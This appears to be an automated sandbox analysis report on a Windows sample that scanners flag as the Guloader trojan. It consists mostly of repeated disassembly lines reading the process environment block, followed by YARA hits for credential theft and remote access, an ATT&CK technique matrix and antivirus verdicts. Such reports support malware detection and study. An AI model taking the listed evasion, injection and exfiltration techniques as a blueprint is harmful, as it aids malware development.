      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37857190 mov eax, dword ptr fs:[00000030h]7_2_37857190
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B11A4 mov eax, dword ptr fs:[00000030h]7_2_378B11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B11A4 mov eax, dword ptr fs:[00000030h]7_2_378B11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B11A4 mov eax, dword ptr fs:[00000030h]7_2_378B11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B11A4 mov eax, dword ptr fs:[00000030h]7_2_378B11A4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781B1B0 mov eax, dword ptr fs:[00000030h]7_2_3781B1B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9148 mov eax, dword ptr fs:[00000030h]7_2_377F9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9148 mov eax, dword ptr fs:[00000030h]7_2_377F9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9148 mov eax, dword ptr fs:[00000030h]7_2_377F9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9148 mov eax, dword ptr fs:[00000030h]7_2_377F9148
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D51CB mov eax, dword ptr fs:[00000030h]7_2_378D51CB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB136 mov eax, dword ptr fs:[00000030h]7_2_377FB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB136 mov eax, dword ptr fs:[00000030h]7_2_377FB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB136 mov eax, dword ptr fs:[00000030h]7_2_377FB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB136 mov eax, dword ptr fs:[00000030h]7_2_377FB136
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783D1D0 mov eax, dword ptr fs:[00000030h]7_2_3783D1D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783D1D0 mov ecx, dword ptr fs:[00000030h]7_2_3783D1D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D31E1 mov eax, dword ptr fs:[00000030h]7_2_378D31E1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378251EF mov eax, dword ptr fs:[00000030h]7_2_378251EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378051ED mov eax, dword ptr fs:[00000030h]7_2_378051ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A71F9 mov esi, dword ptr fs:[00000030h]7_2_378A71F9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D7120 mov eax, dword ptr fs:[00000030h]7_2_378D7120
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801131 mov eax, dword ptr fs:[00000030h]7_2_37801131
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801131 mov eax, dword ptr fs:[00000030h]7_2_37801131
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37893140 mov eax, dword ptr fs:[00000030h]7_2_37893140
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37893140 mov eax, dword ptr fs:[00000030h]7_2_37893140
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37893140 mov eax, dword ptr fs:[00000030h]7_2_37893140
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37807152 mov eax, dword ptr fs:[00000030h]7_2_37807152
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5152 mov eax, dword ptr fs:[00000030h]7_2_378D5152
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37899179 mov eax, dword ptr fs:[00000030h]7_2_37899179
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788D080 mov eax, dword ptr fs:[00000030h]7_2_3788D080
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788D080 mov eax, dword ptr fs:[00000030h]7_2_3788D080
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782D090 mov eax, dword ptr fs:[00000030h]7_2_3782D090
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782D090 mov eax, dword ptr fs:[00000030h]7_2_3782D090
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37805096 mov eax, dword ptr fs:[00000030h]7_2_37805096
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783909C mov eax, dword ptr fs:[00000030h]7_2_3783909C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov ecx, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov ecx, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov ecx, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov ecx, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C0 mov eax, dword ptr fs:[00000030h]7_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787D0C0 mov eax, dword ptr fs:[00000030h]7_2_3787D0C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787D0C0 mov eax, dword ptr fs:[00000030h]7_2_3787D0C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D50D9 mov eax, dword ptr fs:[00000030h]7_2_378D50D9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378290DB mov eax, dword ptr fs:[00000030h]7_2_378290DB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378250E4 mov eax, dword ptr fs:[00000030h]7_2_378250E4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378250E4 mov ecx, dword ptr fs:[00000030h]7_2_378250E4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C903E mov eax, dword ptr fs:[00000030h]7_2_378C903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C903E mov eax, dword ptr fs:[00000030h]7_2_378C903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C903E mov eax, dword ptr fs:[00000030h]7_2_378C903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C903E mov eax, dword ptr fs:[00000030h]7_2_378C903E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B052 mov eax, dword ptr fs:[00000030h]7_2_3782B052
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A705E mov ebx, dword ptr fs:[00000030h]7_2_378A705E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A705E mov eax, dword ptr fs:[00000030h]7_2_378A705E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788106E mov eax, dword ptr fs:[00000030h]7_2_3788106E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5060 mov eax, dword ptr fs:[00000030h]7_2_378D5060
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov ecx, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811070 mov eax, dword ptr fs:[00000030h]7_2_37811070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FD08D mov eax, dword ptr fs:[00000030h]7_2_377FD08D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787D070 mov ecx, dword ptr fs:[00000030h]7_2_3787D070
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov eax, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov eax, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov eax, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov ecx, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F92 mov eax, dword ptr fs:[00000030h]7_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A3F90 mov eax, dword ptr fs:[00000030h]7_2_378A3F90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A3F90 mov eax, dword ptr fs:[00000030h]7_2_378A3F90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783BFB0 mov eax, dword ptr fs:[00000030h]7_2_3783BFB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37841FB8 mov eax, dword ptr fs:[00000030h]7_2_37841FB8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803FC2 mov eax, dword ptr fs:[00000030h]7_2_37803FC2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BBFC0 mov ecx, dword ptr fs:[00000030h]7_2_378BBFC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BBFC0 mov eax, dword ptr fs:[00000030h]7_2_378BBFC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D3FC0 mov eax, dword ptr fs:[00000030h]7_2_378D3FC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37831FCD mov eax, dword ptr fs:[00000030h]7_2_37831FCD
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37831FCD mov eax, dword ptr fs:[00000030h]7_2_37831FCD
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37831FCD mov eax, dword ptr fs:[00000030h]7_2_37831FCD
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37883FD7 mov eax, dword ptr fs:[00000030h]7_2_37883FD7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783BFEC mov eax, dword ptr fs:[00000030h]7_2_3783BFEC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783BFEC mov eax, dword ptr fs:[00000030h]7_2_3783BFEC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783BFEC mov eax, dword ptr fs:[00000030h]7_2_3783BFEC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788DF10 mov eax, dword ptr fs:[00000030h]7_2_3788DF10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37881F13 mov eax, dword ptr fs:[00000030h]7_2_37881F13
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BDF2F mov eax, dword ptr fs:[00000030h]7_2_378BDF2F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FBFD0 mov eax, dword ptr fs:[00000030h]7_2_377FBFD0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A7F3E mov eax, dword ptr fs:[00000030h]7_2_378A7F3E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787FF42 mov eax, dword ptr fs:[00000030h]7_2_3787FF42
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801F50 mov eax, dword ptr fs:[00000030h]7_2_37801F50
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37837F51 mov eax, dword ptr fs:[00000030h]7_2_37837F51
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782BF60 mov eax, dword ptr fs:[00000030h]7_2_3782BF60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FFF90 mov edi, dword ptr fs:[00000030h]7_2_377FFF90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FBE78 mov ecx, dword ptr fs:[00000030h]7_2_377FBE78
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37833E8F mov eax, dword ptr fs:[00000030h]7_2_37833E8F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788DE9B mov eax, dword ptr fs:[00000030h]7_2_3788DE9B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37807E96 mov eax, dword ptr fs:[00000030h]7_2_37807E96
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788DEAA mov eax, dword ptr fs:[00000030h]7_2_3788DEAA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ADEB0 mov eax, dword ptr fs:[00000030h]7_2_378ADEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ADEB0 mov ecx, dword ptr fs:[00000030h]7_2_378ADEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ADEB0 mov eax, dword ptr fs:[00000030h]7_2_378ADEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ADEB0 mov eax, dword ptr fs:[00000030h]7_2_378ADEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ADEB0 mov eax, dword ptr fs:[00000030h]7_2_378ADEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BDEB0 mov eax, dword ptr fs:[00000030h]7_2_378BDEB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780BEC0 mov eax, dword ptr fs:[00000030h]7_2_3780BEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782FEC0 mov eax, dword ptr fs:[00000030h]7_2_3782FEC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788FEC5 mov eax, dword ptr fs:[00000030h]7_2_3788FEC5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B9EDF mov eax, dword ptr fs:[00000030h]7_2_378B9EDF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B9EDF mov eax, dword ptr fs:[00000030h]7_2_378B9EDF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803EE1 mov eax, dword ptr fs:[00000030h]7_2_37803EE1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37833EEB mov ecx, dword ptr fs:[00000030h]7_2_37833EEB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37833EEB mov eax, dword ptr fs:[00000030h]7_2_37833EEB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37833EEB mov eax, dword ptr fs:[00000030h]7_2_37833EEB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CBEE6 mov eax, dword ptr fs:[00000030h]7_2_378CBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CBEE6 mov eax, dword ptr fs:[00000030h]7_2_378CBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CBEE6 mov eax, dword ptr fs:[00000030h]7_2_378CBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CBEE6 mov eax, dword ptr fs:[00000030h]7_2_378CBEE6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FDE10 mov eax, dword ptr fs:[00000030h]7_2_377FDE10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803EF4 mov eax, dword ptr fs:[00000030h]7_2_37803EF4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803EF4 mov eax, dword ptr fs:[00000030h]7_2_37803EF4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803EF4 mov eax, dword ptr fs:[00000030h]7_2_37803EF4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783BE17 mov eax, dword ptr fs:[00000030h]7_2_3783BE17
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D3E10 mov eax, dword ptr fs:[00000030h]7_2_378D3E10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D3E10 mov eax, dword ptr fs:[00000030h]7_2_378D3E10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781DE2D mov eax, dword ptr fs:[00000030h]7_2_3781DE2D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781DE2D mov eax, dword ptr fs:[00000030h]7_2_3781DE2D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781DE2D mov eax, dword ptr fs:[00000030h]7_2_3781DE2D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801E30 mov eax, dword ptr fs:[00000030h]7_2_37801E30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801E30 mov eax, dword ptr fs:[00000030h]7_2_37801E30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5E37 mov eax, dword ptr fs:[00000030h]7_2_378D5E37
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"Jump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000007.00000002.3145283903.0000000037460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000007.00000002.3145283903.0000000037460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping211
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      0GuwV0t2UU.exe58%ReversingLabsWin32.Trojan.Guloader
      0GuwV0t2UU.exe100%AviraHEUR/AGEN.1336713
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
